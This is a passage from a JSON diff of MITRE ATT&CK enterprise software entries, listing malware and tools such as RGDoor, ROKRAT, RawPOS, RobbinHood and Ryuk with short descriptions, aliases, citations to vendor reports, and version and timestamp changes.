"3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:13.198000+00:00\", \"old_value\": \"2025-04-16 20:38:05.635000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--065196de-d7e8-4888-acfb-b2134022ba1b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-11 16:13:19.588000+00:00", + "modified": "2025-04-25 14:42:34.305000+00:00", + "name": "RDFSNIFFER", + "description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0416", + "external_id": "S0416" + }, + { + "source_name": "FireEye FIN7 Oct 2019", + "description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators\u2019 New Tools and Techniques. Retrieved October 11, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RDFSNIFFER" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:34.305000+00:00\", \"old_value\": \"2025-04-16 20:37:52.986000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:32.382000+00:00", + "name": "RGDoor", + "description": "[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0258", + "external_id": "S0258" + }, + { + "source_name": "RGDoor", + "description": "(Citation: Unit 42 RGDoor Jan 2018)" + }, + { + "source_name": "Unit 42 RGDoor Jan 2018", + "description": "Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RGDoor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:32.382000+00:00\", \"old_value\": \"2025-04-16 20:38:32.672000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:11.911000+00:00", + "modified": "2025-04-25 14:44:22.846000+00:00", + "name": "RIPTIDE", + "description": "[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0003", + "external_id": "S0003" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RIPTIDE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:22.846000+00:00\", \"old_value\": \"2025-04-16 20:38:30.044000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--cba78a1c-186f-4112-9e6a-be1839f030f7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:07.565000+00:00", + "modified": "2025-04-25 14:44:42.600000+00:00", + "name": "ROCKBOOT", + "description": "[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0112", + "external_id": "S0112" + }, + { + "source_name": "FireEye Bootkits", + "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ROCKBOOT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:42.600000+00:00\", \"old_value\": \"2025-04-16 20:38:35.715000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:33.037000+00:00", + "name": "ROKRAT", + "description": "[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0240", + "external_id": "S0240" + }, + { + "source_name": "ROKRAT", + "description": "(Citation: Talos ROKRAT 2) (Citation: Talos Group123)" + }, + { + "source_name": "Talos ROKRAT", + "description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.", + "url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html" + }, + { + "source_name": "Talos Group123", + "description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.", + "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + }, + { + "source_name": "Volexity InkySquid RokRAT August 2021", + "description": "Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.", + "url": "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/" + }, + { + "source_name": "Talos ROKRAT 2", + "description": "Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.", + "url": "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ROKRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:33.037000+00:00\", \"old_value\": \"2025-04-16 20:38:12.531000+00:00\"}}}", + "previous_version": "2.3" + }, + { + "type": "malware", + "id": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-27 16:58:08.242000+00:00", + "modified": "2025-04-25 14:44:32.751000+00:00", + "name": "Ramsay", + "description": "[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0458", + "external_id": "S0458" + }, + { + "source_name": "Ramsay", + "description": "(Citation: Eset Ramsay May 2020)" + }, + { + "source_name": "Eset Ramsay May 2020", + "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020.", + "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/" + }, + { + "source_name": "Antiy CERT Ramsay April 2020", + "description": "Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021.", + "url": "https://www.programmersought.com/article/62493896999/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ramsay" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Harry Kim, CODEMIZE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:32.751000+00:00\", \"old_value\": \"2025-04-16 20:38:32.837000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9752aef4-a1f3-4328-929f-b64eb0536090", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:08.401000+00:00", + "name": "RawPOS", + "description": "[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0169", + "external_id": "S0169" + }, + { + "source_name": "RawPOS", + "description": "(Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "FIENDCRY", + "description": "The FIENDCRY component is a memory scraper based on MemPDump that scans through process memory looking for regular expressions. Its stage 1 component scans all processes, and its stage 2 component targets a specific process of interest. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: Github Mempdump) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "DUEBREW", + "description": "The DUEBREW component is a Perl2Exe binary launcher. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "DRIFTWOOD", + "description": "The DRIFTWOOD component is a Perl2Exe compiled Perl script used by G0053 after they have identified data of interest on victims. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "Kroll RawPOS Jan 2017", + "description": "Nesbit, B. and Ackerman, D. (2017, January). Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder\u2019s Toolkit. Retrieved October 4, 2017.", + "url": "https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware" + }, + { + "source_name": "TrendMicro RawPOS April 2015", + "description": "TrendLabs Security Intelligence Blog. (2015, April). RawPOS Technical Brief. Retrieved October 4, 2017.", + "url": "http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf" + }, + { + "source_name": "Visa RawPOS March 2015", + "description": "Visa. (2015, March). Visa Security Alert: \"RawPOS\" Malware Targeting Lodging Merchants. Retrieved October 6, 2017.", + "url": "https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + }, + { + "source_name": "DarkReading FireEye FIN5 Oct 2015", + "description": "Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.", + "url": "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" + }, + { + "source_name": "Github Mempdump", + "description": "DiabloHorn. (2015, March 22). mempdump. Retrieved October 6, 2017.", + "url": "https://github.com/DiabloHorn/mempdump" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RawPOS", + "FIENDCRY", + "DUEBREW", + "DRIFTWOOD" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Walker Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:08.401000+00:00\", \"old_value\": \"2025-04-16 20:38:24.883000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4e6b9625-bbda-4d96-a652-b3bb45453f26", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:43:16.265000+00:00", + "name": "RemoteCMD", + "description": "[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. (Citation: Symantec Buckeye)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0166", + "external_id": "S0166" + }, + { + "source_name": "Symantec Buckeye", + "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.", + "url": "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RemoteCMD" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:16.265000+00:00\", \"old_value\": \"2025-04-16 20:38:06.578000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-18 14:57:34.628000+00:00", + "modified": "2025-04-25 14:45:11.980000+00:00", + "name": "RemoteUtilities", + "description": "[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0592", + "external_id": "S0592" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RemoteUtilities" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:11.980000+00:00\", \"old_value\": \"2025-04-16 20:38:49.636000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0a607c53-df52-45da-a75d-0e53df4dad5f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-29 14:27:18.204000+00:00", + "modified": "2025-04-25 14:42:38.861000+00:00", + "name": "RobbinHood", + "description": "[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0400", + "external_id": "S0400" + }, + { + "source_name": "CarbonBlack RobbinHood May 2019", + "description": "Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.", + "url": "https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/" + }, + { + "source_name": "BaltimoreSun RobbinHood May 2019", + "description": "Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.", + "url": "https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RobbinHood" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:38.861000+00:00\", \"old_value\": \"2025-04-16 20:37:54.940000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6b616fc1-1505-48e3-8b2c-0d19337bff38", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:58.226000+00:00", + "modified": "2025-04-25 14:43:40.835000+00:00", + "name": "Rover", + "description": "[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0090", + "external_id": "S0090" + }, + { + "source_name": "Palo Alto Rover", + "description": "Ray, V., Hayashi, K. (2016, February 29). New Malware \u2018Rover\u2019 Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Rover" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:40.835000+00:00\", \"old_value\": \"2025-04-16 20:38:15.344000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-02-04 18:27:00.501000+00:00", + "modified": "2025-04-25 14:45:22.953000+00:00", + "name": "Ruler", + "description": "[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0358", + "external_id": "S0358" + }, + { + "source_name": "SensePost Ruler GitHub", + "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/ruler" + }, + { + "source_name": "SensePost NotRuler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/notruler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ruler" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office Suite" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:22.953000+00:00\", \"old_value\": \"2025-04-16 20:38:53.872000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:33.592000+00:00", + "name": "RunningRAT", + "description": "[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0253", + "external_id": "S0253" + }, + { + "source_name": "RunningRAT", + "description": "(Citation: McAfee Gold Dragon)" + }, + { + "source_name": "McAfee Gold Dragon", + "description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RunningRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:33.592000+00:00\", \"old_value\": \"2025-04-16 20:38:12.728000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-13 20:14:53.171000+00:00", + "modified": "2025-04-22 22:21:23.589000+00:00", + "name": "Ryuk", + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0446", + "external_id": "S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "FireEye FIN6 